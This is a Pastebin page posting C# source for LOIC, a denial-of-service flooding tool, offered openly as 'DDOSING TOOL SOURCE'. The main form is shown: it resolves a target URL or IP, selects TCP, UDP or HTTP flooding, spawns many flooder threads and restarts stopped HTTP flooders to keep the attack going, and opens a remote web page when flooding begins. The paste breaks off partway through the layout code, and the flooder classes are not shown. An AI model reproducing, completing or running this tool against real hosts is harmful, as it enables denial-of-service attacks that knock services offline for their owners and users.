Advertisement
FederationHax

LOIC DDOS tool source | BY Federation

Jun 7th, 2016
184
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 46.23 KB | None | 0 0
  1. BY FEDERATIONHAX| LOIC - DDOSING TOOL SOURCE
  2. ----------------|-----------------------------------
  3.  
  4.  
  5. using System;
  6. using System.Collections.Generic;
  7. using System.ComponentModel;
  8. using System.Drawing;
  9. using System.Globalization;
  10. using System.Linq;
  11. using System.Net;
  12. using System.Windows.Forms;
  13.  
  14. namespace LOIC
  15. {
  16. public class frmMain : Form
  17. {
  18. private bool attack;
  19. private bool browser;
  20. private static IFlooder[] arr;
  21. private static string sIP;
  22. private static string sData;
  23. private static string sSubsite;
  24. private static int iPort;
  25. private static int iThreads;
  26. private static int iProtocol;
  27. private static int iDelay;
  28. private static int iTimeout;
  29. private static bool bResp;
  30. private static bool intShowStats;
  31. private IContainer components;
  32. private GroupBox groupBox1;
  33. private Button cmdTargetURL;
  34. private TextBox txtTargetURL;
  35. private Label label2;
  36. private Button cmdTargetIP;
  37. private TextBox txtTargetIP;
  38. private Label label1;
  39. private GroupBox groupBox2;
  40. private TextBox txtTarget;
  41. private Label label5;
  42. private Label label3;
  43. private GroupBox groupBox3;
  44. private TextBox txtPort;
  45. private TextBox txtThreads;
  46. private ComboBox cbMethod;
  47. private TextBox txtTimeout;
  48. private Label label10;
  49. private GroupBox groupBox4;
  50. private Button cmdAttack;
  51. private Label label11;
  52. private GroupBox groupBox5;
  53. private Label label22;
  54. private Label label23;
  55. private Label lbDownloaded;
  56. private Label lbDownloading;
  57. private Label lbRequesting;
  58. private Label lbConnecting;
  59. private Label lbIdle;
  60. private Label label12;
  61. private Label label13;
  62. private Label label14;
  63. private Label label15;
  64. private Label label16;
  65. private Label lbFailed;
  66. private Label lbRequested;
  67. private TextBox txtSubsite;
  68. private ToolTip TTip;
  69. private TextBox txtData;
  70. private Timer tShowStats;
  71. private Label label19;
  72. private Label label7;
  73. private Label label4;
  74. private Label label6;
  75. private Label label20;
  76. private CheckBox chkResp;
  77. private TrackBar tbSpeed;
  78. private Label label18;
  79. private Label label17;
  80. private Label label9;
  81. private Label label21;
  82. private PictureBox pBanner;
  83. private WebBrowser cBrowser;
  84.  
  85. public frmMain()
  86. {
  87. this.InitializeComponent();
  88. }
  89.  
  90. private void frmMain_Load(object sender, EventArgs e)
  91. {
  92. this.Text = string.Format("{0} | When harpoons, air strikes and nukes fails | v. {1}", (object) Application.ProductName, (object) Application.ProductVersion);
  93. }
  94.  
  95. private void cmdTargetURL_Click(object sender, EventArgs e)
  96. {
  97. string uriString = this.txtTargetURL.Text.ToLower();
  98. if (uriString.Length == 0)
  99. {
  100. using (frmWtf frmWtf = new frmWtf())
  101. {
  102. frmWtf.Show();
  103. int num = (int) MessageBox.Show("A URL is fine too...", "What the shit.");
  104. }
  105. }
  106. else
  107. {
  108. if (!uriString.StartsWith("http://"))
  109. {
  110. if (!uriString.StartsWith("https://"))
  111. uriString = "http://" + uriString;
  112. }
  113. try
  114. {
  115. IPAddress[] addressList = Dns.GetHostEntry(new Uri(uriString).Host).AddressList;
  116. this.txtTarget.Text = (addressList.Length > 1 ? (object) addressList[new Random().Next(addressList.Length)] : (object) ((IEnumerable<IPAddress>) addressList).First<IPAddress>()).ToString();
  117. }
  118. catch
  119. {
  120. using (frmWtf frmWtf = new frmWtf())
  121. {
  122. frmWtf.Show();
  123. int num = (int) MessageBox.Show("Write the complete address", "What the shit.");
  124. }
  125. }
  126. }
  127. }
  128.  
  129. private void cmdTargetIP_Click(object sender, EventArgs e)
  130. {
  131. if (this.txtTargetIP.Text.Length == 0)
  132. {
  133. using (frmWtf frmWtf = new frmWtf())
  134. {
  135. frmWtf.Show();
  136. int num = (int) MessageBox.Show("I think you forgot the IP.", "What the shit.");
  137. }
  138. }
  139. else
  140. this.txtTarget.Text = this.txtTargetIP.Text;
  141. }
  142.  
  143. private void txtTarget_Enter(object sender, EventArgs e)
  144. {
  145. this.cmdAttack.Focus();
  146. }
  147.  
  148. private void cmdAttack_Click(object sender, EventArgs e)
  149. {
  150. if (!this.attack)
  151. {
  152. this.attack = true;
  153. try
  154. {
  155. frmMain.sIP = this.txtTarget.Text;
  156. if (!int.TryParse(this.txtPort.Text, out frmMain.iPort))
  157. throw new Exception("I don't think ports are supposed to be written like THAT.");
  158. if (!int.TryParse(this.txtThreads.Text, out frmMain.iThreads))
  159. throw new Exception("What on earth made you put THAT in the threads field?");
  160. if (string.IsNullOrEmpty(this.txtTarget.Text) || string.Equals(this.txtTarget.Text, "N O N E !"))
  161. throw new Exception("Select a target.");
  162. frmMain.iProtocol = 0;
  163. switch (this.cbMethod.Text)
  164. {
  165. case "TCP":
  166. frmMain.iProtocol = 1;
  167. break;
  168. case "UDP":
  169. frmMain.iProtocol = 2;
  170. break;
  171. case "HTTP":
  172. frmMain.iProtocol = 3;
  173. break;
  174. default:
  175. throw new Exception("Select a proper attack method.");
  176. }
  177. frmMain.sData = this.txtData.Text.Replace("\\r", "\r").Replace("\\n", "\n");
  178. if (string.IsNullOrEmpty(frmMain.sData) && (frmMain.iProtocol == 1 || frmMain.iProtocol == 2))
  179. throw new Exception("Gonna spam with no contents? You're a wise fellow, aren't ya? o.O");
  180. if (!this.txtSubsite.Text.StartsWith("/") && frmMain.iProtocol == 3)
  181. throw new Exception("You have to enter a subsite (for example \"/\")");
  182. frmMain.sSubsite = this.txtSubsite.Text;
  183. if (!int.TryParse(this.txtTimeout.Text, out frmMain.iTimeout))
  184. throw new Exception("What's up with something like that in the timeout box? =S");
  185. frmMain.bResp = this.chkResp.Checked;
  186. }
  187. catch (Exception ex)
  188. {
  189. using (frmWtf frmWtf = new frmWtf())
  190. {
  191. frmWtf.Show();
  192. int num = (int) MessageBox.Show(ex.Message, "What the shit.");
  193. }
  194. this.attack = false;
  195. return;
  196. }
  197. this.cmdAttack.Text = "Stop flooding";
  198. if (!this.browser)
  199. {
  200. try
  201. {
  202. this.cBrowser.Navigate("https://j.mp/loicweb");
  203. }
  204. finally
  205. {
  206. this.browser = true;
  207. }
  208. }
  209. switch (frmMain.iProtocol)
  210. {
  211. case 1:
  212. case 2:
  213. frmMain.arr = (IFlooder[]) Enumerable.Range(0, frmMain.iThreads).Select<int, XXPFlooder>((Func<int, XXPFlooder>) (i => new XXPFlooder(frmMain.sIP, frmMain.iPort, frmMain.iProtocol, frmMain.iDelay, frmMain.bResp, frmMain.sData))).ToArray<XXPFlooder>();
  214. break;
  215. case 3:
  216. frmMain.arr = (IFlooder[]) Enumerable.Range(0, frmMain.iThreads).Select<int, HTTPFlooder>((Func<int, HTTPFlooder>) (i => new HTTPFlooder(frmMain.sIP, frmMain.iPort, frmMain.sSubsite, frmMain.bResp, frmMain.iDelay, frmMain.iTimeout))).ToArray<HTTPFlooder>();
  217. break;
  218. }
  219. foreach (IFlooder flooder in frmMain.arr)
  220. flooder.Start();
  221. this.tShowStats.Start();
  222. }
  223. else
  224. {
  225. this.attack = false;
  226. this.cmdAttack.Text = "IMMA CHARGIN MAH LAZER";
  227. foreach (IFlooder flooder in frmMain.arr)
  228. flooder.Stop();
  229. this.tShowStats.Stop();
  230. frmMain.arr = (IFlooder[]) null;
  231. }
  232. }
  233.  
  234. private void tShowStats_Tick(object sender, EventArgs e)
  235. {
  236. if (frmMain.intShowStats)
  237. return;
  238. frmMain.intShowStats = true;
  239. switch (frmMain.iProtocol)
  240. {
  241. case 1:
  242. case 2:
  243. this.lbRequested.Text = frmMain.arr.Cast<XXPFlooder>().Sum<XXPFlooder>((Func<XXPFlooder, int>) (f => f.FloodCount)).ToString((IFormatProvider) CultureInfo.InvariantCulture);
  244. break;
  245. case 3:
  246. int num1 = 0;
  247. int num2 = 0;
  248. int num3 = 0;
  249. int num4 = 0;
  250. int num5 = 0;
  251. int num6 = 0;
  252. int num7 = 0;
  253. for (int index = 0; index < frmMain.arr.Length; ++index)
  254. {
  255. HTTPFlooder httpFlooder1 = (HTTPFlooder) frmMain.arr[index];
  256. num5 += httpFlooder1.Downloaded;
  257. num6 += httpFlooder1.Requested;
  258. num7 += httpFlooder1.Failed;
  259. switch (httpFlooder1.State)
  260. {
  261. case ReqState.Ready:
  262. case ReqState.Completed:
  263. ++num1;
  264. break;
  265. case ReqState.Connecting:
  266. ++num2;
  267. break;
  268. case ReqState.Requesting:
  269. ++num3;
  270. break;
  271. case ReqState.Downloading:
  272. ++num4;
  273. break;
  274. }
  275. if (!httpFlooder1.IsFlooding)
  276. {
  277. int downloaded = httpFlooder1.Downloaded;
  278. int requested = httpFlooder1.Requested;
  279. int failed = httpFlooder1.Failed;
  280. HTTPFlooder httpFlooder2 = new HTTPFlooder(frmMain.sIP, frmMain.iPort, frmMain.sSubsite, frmMain.bResp, frmMain.iDelay, frmMain.iTimeout)
  281. {
  282. Downloaded = downloaded,
  283. Requested = requested,
  284. Failed = failed
  285. };
  286. httpFlooder2.Start();
  287. frmMain.arr[index] = (IFlooder) httpFlooder2;
  288. }
  289. }
  290. this.lbFailed.Text = num7.ToString((IFormatProvider) CultureInfo.InvariantCulture);
  291. this.lbRequested.Text = num6.ToString((IFormatProvider) CultureInfo.InvariantCulture);
  292. this.lbDownloaded.Text = num5.ToString((IFormatProvider) CultureInfo.InvariantCulture);
  293. this.lbDownloading.Text = num4.ToString((IFormatProvider) CultureInfo.InvariantCulture);
  294. this.lbRequesting.Text = num3.ToString((IFormatProvider) CultureInfo.InvariantCulture);
  295. this.lbConnecting.Text = num2.ToString((IFormatProvider) CultureInfo.InvariantCulture);
  296. this.lbIdle.Text = num1.ToString((IFormatProvider) CultureInfo.InvariantCulture);
  297. break;
  298. }
  299. frmMain.intShowStats = false;
  300. }
  301.  
  302. private void tbSpeed_ValueChanged(object sender, EventArgs e)
  303. {
  304. frmMain.iDelay = this.tbSpeed.Value;
  305. if (frmMain.arr == null)
  306. return;
  307. foreach (IFlooder flooder in frmMain.arr)
  308. flooder.Delay = frmMain.iDelay;
  309. }
  310.  
  311. private void cBrowser_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
  312. {
  313. this.pBanner.Visible = false;
  314. this.cBrowser.Visible = true;
  315. }
  316.  
  317. protected override void Dispose(bool disposing)
  318. {
  319. if (disposing && this.components != null)
  320. this.components.Dispose();
  321. base.Dispose(disposing);
  322. }
  323.  
  324. private void InitializeComponent()
  325. {
  326. this.components = new System.ComponentModel.Container();
  327. this.groupBox1 = new System.Windows.Forms.GroupBox();
  328. this.label2 = new System.Windows.Forms.Label();
  329. this.cmdTargetIP = new System.Windows.Forms.Button();
  330. this.txtTargetIP = new System.Windows.Forms.TextBox();
  331. this.label1 = new System.Windows.Forms.Label();
  332. this.cmdTargetURL = new System.Windows.Forms.Button();
  333. this.txtTargetURL = new System.Windows.Forms.TextBox();
  334. this.groupBox2 = new System.Windows.Forms.GroupBox();
  335. this.txtTarget = new System.Windows.Forms.TextBox();
  336. this.label5 = new System.Windows.Forms.Label();
  337. this.label3 = new System.Windows.Forms.Label();
  338. this.groupBox3 = new System.Windows.Forms.GroupBox();
  339. this.label21 = new System.Windows.Forms.Label();
  340. this.label18 = new System.Windows.Forms.Label();
  341. this.label17 = new System.Windows.Forms.Label();
  342. this.label9 = new System.Windows.Forms.Label();
  343. this.label7 = new System.Windows.Forms.Label();
  344. this.label4 = new System.Windows.Forms.Label();
  345. this.label6 = new System.Windows.Forms.Label();
  346. this.label20 = new System.Windows.Forms.Label();
  347. this.chkResp = new System.Windows.Forms.CheckBox();
  348. this.txtData = new System.Windows.Forms.TextBox();
  349. this.txtSubsite = new System.Windows.Forms.TextBox();
  350. this.txtTimeout = new System.Windows.Forms.TextBox();
  351. this.txtThreads = new System.Windows.Forms.TextBox();
  352. this.cbMethod = new System.Windows.Forms.ComboBox();
  353. this.txtPort = new System.Windows.Forms.TextBox();
  354. this.tbSpeed = new System.Windows.Forms.TrackBar();
  355. this.label10 = new System.Windows.Forms.Label();
  356. this.groupBox4 = new System.Windows.Forms.GroupBox();
  357. this.cmdAttack = new System.Windows.Forms.Button();
  358. this.label11 = new System.Windows.Forms.Label();
  359. this.groupBox5 = new System.Windows.Forms.GroupBox();
  360. this.label19 = new System.Windows.Forms.Label();
  361. this.lbFailed = new System.Windows.Forms.Label();
  362. this.lbRequested = new System.Windows.Forms.Label();
  363. this.label22 = new System.Windows.Forms.Label();
  364. this.label23 = new System.Windows.Forms.Label();
  365. this.lbDownloaded = new System.Windows.Forms.Label();
  366. this.lbDownloading = new System.Windows.Forms.Label();
  367. this.lbRequesting = new System.Windows.Forms.Label();
  368. this.lbConnecting = new System.Windows.Forms.Label();
  369. this.lbIdle = new System.Windows.Forms.Label();
  370. this.label12 = new System.Windows.Forms.Label();
  371. this.label13 = new System.Windows.Forms.Label();
  372. this.label14 = new System.Windows.Forms.Label();
  373. this.label15 = new System.Windows.Forms.Label();
  374. this.label16 = new System.Windows.Forms.Label();
  375. this.TTip = new System.Windows.Forms.ToolTip(this.components);
  376. this.tShowStats = new System.Windows.Forms.Timer(this.components);
  377. this.pBanner = new System.Windows.Forms.PictureBox();
  378. this.cBrowser = new System.Windows.Forms.WebBrowser();
  379. this.groupBox1.SuspendLayout();
  380. this.groupBox2.SuspendLayout();
  381. this.groupBox3.SuspendLayout();
  382. ((System.ComponentModel.ISupportInitialize)(this.tbSpeed)).BeginInit();
  383. this.groupBox4.SuspendLayout();
  384. this.groupBox5.SuspendLayout();
  385. ((System.ComponentModel.ISupportInitialize)(this.pBanner)).BeginInit();
  386. this.SuspendLayout();
  387. //
  388. // groupBox1
  389. //
  390. this.groupBox1.Controls.Add(this.label2);
  391. this.groupBox1.Controls.Add(this.cmdTargetIP);
  392. this.groupBox1.Controls.Add(this.txtTargetIP);
  393. this.groupBox1.Controls.Add(this.label1);
  394. this.groupBox1.Controls.Add(this.cmdTargetURL);
  395. this.groupBox1.Controls.Add(this.txtTargetURL);
  396. this.groupBox1.ForeColor = System.Drawing.Color.LightBlue;
  397. this.groupBox1.Location = new System.Drawing.Point(212, 12);
  398. this.groupBox1.Name = "groupBox1";
  399. this.groupBox1.Size = new System.Drawing.Size(465, 75);
  400. this.groupBox1.TabIndex = 1;
  401. this.groupBox1.TabStop = false;
  402. this.groupBox1.Text = "1. Select your target";
  403. //
  404. // label2
  405. //
  406. this.label2.Location = new System.Drawing.Point(6, 51);
  407. this.label2.Name = "label2";
  408. this.label2.Size = new System.Drawing.Size(30, 14);
  409. this.label2.TabIndex = 5;
  410. this.label2.Text = "IP";
  411. this.label2.TextAlign = System.Drawing.ContentAlignment.MiddleRight;
  412. //
  413. // cmdTargetIP
  414. //
  415. this.cmdTargetIP.BackColor = System.Drawing.Color.Black;
  416. this.cmdTargetIP.ForeColor = System.Drawing.Color.Azure;
  417. this.cmdTargetIP.Location = new System.Drawing.Point(388, 47);
  418. this.cmdTargetIP.Name = "cmdTargetIP";
  419. this.cmdTargetIP.Size = new System.Drawing.Size(71, 22);
  420. this.cmdTargetIP.TabIndex = 4;
  421. this.cmdTargetIP.Text = "Lock on";
  422. this.cmdTargetIP.UseVisualStyleBackColor = false;
  423. this.cmdTargetIP.Click += new System.EventHandler(this.cmdTargetIP_Click);
  424. //
  425. // txtTargetIP
  426. //
  427. this.txtTargetIP.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(48)))), ((int)(((byte)(64)))));
  428. this.txtTargetIP.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
  429. this.txtTargetIP.ForeColor = System.Drawing.Color.Azure;
  430. this.txtTargetIP.Location = new System.Drawing.Point(42, 48);
  431. this.txtTargetIP.Name = "txtTargetIP";
  432. this.txtTargetIP.Size = new System.Drawing.Size(340, 20);
  433. this.txtTargetIP.TabIndex = 3;
  434. this.TTip.SetToolTip(this.txtTargetIP, "If you know your target\'s IP, enter the IP here and click \"Lock on\"");
  435. //
  436. // label1
  437. //
  438. this.label1.Location = new System.Drawing.Point(6, 23);
  439. this.label1.Name = "label1";
  440. this.label1.Size = new System.Drawing.Size(30, 14);
  441. this.label1.TabIndex = 2;
  442. this.label1.Text = "URL";
  443. this.label1.TextAlign = System.Drawing.ContentAlignment.MiddleRight;
  444. //
  445. // cmdTargetURL
  446. //
  447. this.cmdTargetURL.BackColor = System.Drawing.Color.Black;
  448. this.cmdTargetURL.ForeColor = System.Drawing.Color.Azure;
  449. this.cmdTargetURL.Location = new System.Drawing.Point(388, 19);
  450. this.cmdTargetURL.Name = "cmdTargetURL";
  451. this.cmdTargetURL.Size = new System.Drawing.Size(71, 22);
  452. this.cmdTargetURL.TabIndex = 2;
  453. this.cmdTargetURL.Text = "Lock on";
  454. this.cmdTargetURL.UseVisualStyleBackColor = false;
  455. this.cmdTargetURL.Click += new System.EventHandler(this.cmdTargetURL_Click);
  456. //
  457. // txtTargetURL
  458. //
  459. this.txtTargetURL.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(48)))), ((int)(((byte)(64)))));
  460. this.txtTargetURL.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
  461. this.txtTargetURL.ForeColor = System.Drawing.Color.Azure;
  462. this.txtTargetURL.Location = new System.Drawing.Point(42, 20);
  463. this.txtTargetURL.Name = "txtTargetURL";
  464. this.txtTargetURL.Size = new System.Drawing.Size(340, 20);
  465. this.txtTargetURL.TabIndex = 1;
  466. this.TTip.SetToolTip(this.txtTargetURL, "If you don\'t know your target\'s IP, enter a URL here and click \"Lock on\"");
  467. //
  468. // groupBox2
  469. //
  470. this.groupBox2.Controls.Add(this.txtTarget);
  471. this.groupBox2.ForeColor = System.Drawing.Color.LightBlue;
  472. this.groupBox2.Location = new System.Drawing.Point(380, 124);
  473. this.groupBox2.Name = "groupBox2";
  474. this.groupBox2.Size = new System.Drawing.Size(428, 90);
  475. this.groupBox2.TabIndex = 3;
  476. this.groupBox2.TabStop = false;
  477. this.groupBox2.Text = "Selected target";
  478. //
  479. // txtTarget
  480. //
  481. this.txtTarget.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(128)))), ((int)(((byte)(255)))), ((int)(((byte)(255)))));
  482. this.txtTarget.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
  483. this.txtTarget.Font = new System.Drawing.Font("Impact", 27.75F, ((System.Drawing.FontStyle)((System.Drawing.FontStyle.Bold | System.Drawing.FontStyle.Italic))), System.Drawing.GraphicsUnit.Point, ((byte)(0)));
  484. this.txtTarget.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(255)))), ((int)(((byte)(128)))));
  485. this.txtTarget.Location = new System.Drawing.Point(6, 19);
  486. this.txtTarget.Name = "txtTarget";
  487. this.txtTarget.Size = new System.Drawing.Size(402, 53);
  488. this.txtTarget.TabIndex = 1;
  489. this.txtTarget.TabStop = false;
  490. this.txtTarget.Text = "N O N E !";
  491. this.txtTarget.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
  492. this.TTip.SetToolTip(this.txtTarget, "The currently selected target");
  493. this.txtTarget.Enter += new System.EventHandler(this.txtTarget_Enter);
  494. //
  495. // label5
  496. //
  497. this.label5.Location = new System.Drawing.Point(212, 90);
  498. this.label5.Name = "label5";
  499. this.label5.Size = new System.Drawing.Size(23, 23);
  500. this.label5.TabIndex = 7;
  501. //
  502. // label3
  503. //
  504. this.label3.Location = new System.Drawing.Point(212, 232);
  505. this.label3.Name = "label3";
  506. this.label3.Size = new System.Drawing.Size(23, 23);
  507. this.label3.TabIndex = 8;
  508. //
  509. // groupBox3
  510. //
  511. this.groupBox3.BackColor = System.Drawing.Color.Tomato;
  512. this.groupBox3.Controls.Add(this.label21);
  513. this.groupBox3.Controls.Add(this.label18);
  514. this.groupBox3.Controls.Add(this.label17);
  515. this.groupBox3.Controls.Add(this.label9);
  516. this.groupBox3.Controls.Add(this.label7);
  517. this.groupBox3.Controls.Add(this.label4);
  518. this.groupBox3.Controls.Add(this.label6);
  519. this.groupBox3.Controls.Add(this.label20);
  520. this.groupBox3.Controls.Add(this.chkResp);
  521. this.groupBox3.Controls.Add(this.txtData);
  522. this.groupBox3.Controls.Add(this.txtSubsite);
  523. this.groupBox3.Controls.Add(this.txtTimeout);
  524. this.groupBox3.Controls.Add(this.txtThreads);
  525. this.groupBox3.Controls.Add(this.cbMethod);
  526. this.groupBox3.Controls.Add(this.txtPort);
  527. this.groupBox3.Controls.Add(this.tbSpeed);
  528. this.groupBox3.ForeColor = System.Drawing.Color.LightBlue;
  529. this.groupBox3.Location = new System.Drawing.Point(212, 258);
  530. this.groupBox3.Name = "groupBox3";
  531. this.groupBox3.Size = new System.Drawing.Size(758, 112);
  532. this.groupBox3.TabIndex = 4;
  533. this.groupBox3.TabStop = false;
  534. this.groupBox3.Text = "3. Attack options";
  535. //
  536. // label21
  537. //
  538. this.label21.BackColor = System.Drawing.Color.Azure;
  539. this.label21.Location = new System.Drawing.Point(6, 61);
  540. this.label21.Name = "label21";
  541. this.label21.Size = new System.Drawing.Size(746, 1);
  542. this.label21.TabIndex = 27;
  543. this.label21.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  544. //
  545. // label18
  546. //
  547. this.label18.Location = new System.Drawing.Point(359, 16);
  548. this.label18.Name = "label18";
  549. this.label18.Size = new System.Drawing.Size(393, 15);
  550. this.label18.TabIndex = 25;
  551. this.label18.Text = "TCP / UDP message";
  552. this.label18.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  553. //
  554. // label17
  555. //
  556. this.label17.Location = new System.Drawing.Point(62, 16);
  557. this.label17.Name = "label17";
  558. this.label17.Size = new System.Drawing.Size(291, 15);
  559. this.label17.TabIndex = 24;
  560. this.label17.Text = "HTTP Subsite";
  561. this.label17.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  562. //
  563. // label9
  564. //
  565. this.label9.Location = new System.Drawing.Point(6, 16);
  566. this.label9.Name = "label9";
  567. this.label9.Size = new System.Drawing.Size(50, 15);
  568. this.label9.TabIndex = 23;
  569. this.label9.Text = "Timeout";
  570. this.label9.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  571. //
  572. // label7
  573. //
  574. this.label7.Location = new System.Drawing.Point(168, 94);
  575. this.label7.Name = "label7";
  576. this.label7.Size = new System.Drawing.Size(75, 15);
  577. this.label7.TabIndex = 22;
  578. this.label7.Text = "Threads";
  579. this.label7.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  580. //
  581. // label4
  582. //
  583. this.label4.Location = new System.Drawing.Point(87, 94);
  584. this.label4.Name = "label4";
  585. this.label4.Size = new System.Drawing.Size(75, 15);
  586. this.label4.TabIndex = 21;
  587. this.label4.Text = "Method";
  588. this.label4.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  589. //
  590. // label6
  591. //
  592. this.label6.Location = new System.Drawing.Point(6, 94);
  593. this.label6.Name = "label6";
  594. this.label6.Size = new System.Drawing.Size(75, 15);
  595. this.label6.TabIndex = 20;
  596. this.label6.Text = "Port";
  597. this.label6.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  598. //
  599. // label20
  600. //
  601. this.label20.Location = new System.Drawing.Point(362, 94);
  602. this.label20.Name = "label20";
  603. this.label20.Size = new System.Drawing.Size(390, 15);
  604. this.label20.TabIndex = 18;
  605. this.label20.Text = "<= faster Speed slower =>";
  606. this.label20.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
  607. //
  608. // chkResp
  609. //
  610. this.chkResp.AutoSize = true;
  611. this.chkResp.Checked = true;
  612. this.chkResp.CheckState = System.Windows.Forms.CheckState.Checked;
  613. this.chkResp.Location = new System.Drawing.Point(249, 72);
  614. this.chkResp.Name = "chkResp";
  615. this.chkResp.Size = new System.Drawing.Size(91, 18);
  616. this.chkResp.TabIndex = 7;
  617. this.chkResp.Text = "Wait for reply";
  618. this.TTip.SetToolTip(this.chkResp, "Don\'t disconnect before the server\'s started to answer");
  619. this.chkResp.UseVisualStyleBackColor = true;
  620. //
  621. // txtData
  622. //
  623. this.txtData.BackColor = System.Drawing.Color.Black;
  624. this.txtData.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
  625. this.txtData.Font = new System.Drawing.Font("Arial", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
  626. this.txtData.ForeColor = System.Drawing.Color.Azure;
  627. this.txtData.Location = new System.Drawing.Point(359, 34);
  628. this.txtData.Name = "txtData";
  629. this.txtData.Size = new System.Drawing.Size(393, 20);
  630. this.txtData.TabIndex = 3;
  631. this.txtData.Text = "A cat is fine too. Desudesudesu~";
  632. this.txtData.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
  633. this.TTip.SetToolTip(this.txtData, "The data to send in TCP/UDP mode");
  634. //
  635. // txtSubsite
  636. //
  637. this.txtSubsite.BackColor = System.Drawing.Color.Black;
  638. this.txtSubsite.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
  639. this.txtSubsite.Font = new System.Drawing.Font("Arial", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
  640. this.txtSubsite.ForeColor = System.Drawing.Color.Azure;
  641. this.txtSubsite.Location = new System.Drawing.Point(62, 34);
  642. this.txtSubsite.Name = "txtSubsite";
  643. this.txtSubsite.Size = new System.Drawing.Size(291, 20);
  644. this.txtSubsite.TabIndex = 2;
  645. this.txtSubsite.Text = "/";
  646. this.txtSubsite.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
  647. this.TTip.SetToolTip(this.txtSubsite, "What subsite to target (when using HTTP as type)");
  648. //
  649. // txtTimeout
  650. //
  651. this.txtTimeout.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(48)))), ((int)(((byte)(64)))));
  652. this.txtTimeout.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
  653. this.txtTimeout.Font = new System.Drawing.Font("Arial", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
  654. this.txtTimeout.ForeColor = System.Drawing.Color.Azure;
  655. this.txtTimeout.Location = new System.Drawing.Point(6, 34);
  656. this.txtTimeout.Name = "txtTimeout";
  657. this.txtTimeout.Size = new System.Drawing.Size(50, 20);
  658. this.txtTimeout.TabIndex = 1;
  659. this.txtTimeout.Text = "9001";
  660. this.txtTimeout.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
  661. this.TTip.SetToolTip(this.txtTimeout, "Max time to wait for a response");
  662. //
  663. // txtThreads
  664. //
  665. this.txtThreads.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(48)))), ((int)(((byte)(64)))));
  666. this.txtThreads.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
  667. this.txtThreads.Font = new System.Drawing.Font("Arial", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
  668. this.txtThreads.ForeColor = System.Drawing.Color.Azure;
  669. this.txtThreads.Location = new System.Drawing.Point(168, 71);
  670. this.txtThreads.Name = "txtThreads";
  671. this.txtThreads.Size = new System.Drawing.Size(75, 20);
  672. this.txtThreads.TabIndex = 6;
  673. this.txtThreads.Text = "10";
  674. this.txtThreads.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
  675. this.TTip.SetToolTip(this.txtThreads, "How many users LOIC should emulate");
  676. //
  677. // cbMethod
  678. //
  679. this.cbMethod.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(48)))), ((int)(((byte)(64)))));
  680. this.cbMethod.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
  681. this.cbMethod.FlatStyle = System.Windows.Forms.FlatStyle.Popup;
  682. this.cbMethod.Font = new System.Drawing.Font("Arial", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
  683. this.cbMethod.ForeColor = System.Drawing.Color.Azure;
  684. this.cbMethod.FormattingEnabled = true;
  685. this.cbMethod.Items.AddRange(new object[] {
  686. "TCP",
  687. "UDP",
  688. "HTTP"});
  689. this.cbMethod.Location = new System.Drawing.Point(87, 69);
  690. this.cbMethod.Name = "cbMethod";
  691. this.cbMethod.Size = new System.Drawing.Size(75, 22);
  692. this.cbMethod.TabIndex = 5;
  693. this.TTip.SetToolTip(this.cbMethod, "What type of attack to launch");
  694. //
  695. // txtPort
  696. //
  697. this.txtPort.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(48)))), ((int)(((byte)(64)))));
  698. this.txtPort.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
  699. this.txtPort.Font = new System.Drawing.Font("Arial", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
  700. this.txtPort.ForeColor = System.Drawing.Color.Azure;
  701. this.txtPort.Location = new System.Drawing.Point(6, 70);
  702. this.txtPort.Name = "txtPort";
  703. this.txtPort.Size = new System.Drawing.Size(75, 20);
  704. this.txtPort.TabIndex = 4;
  705. this.txtPort.Text = "80";
  706. this.txtPort.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
  707. this.TTip.SetToolTip(this.txtPort, "What port to attack (regular websites use 80)");
  708. //
  709. // tbSpeed
  710. //
  711. this.tbSpeed.Location = new System.Drawing.Point(362, 65);
  712. this.tbSpeed.Maximum = 20;
  713. this.tbSpeed.Name = "tbSpeed";
  714. this.tbSpeed.Size = new System.Drawing.Size(390, 45);
  715. this.tbSpeed.TabIndex = 8;
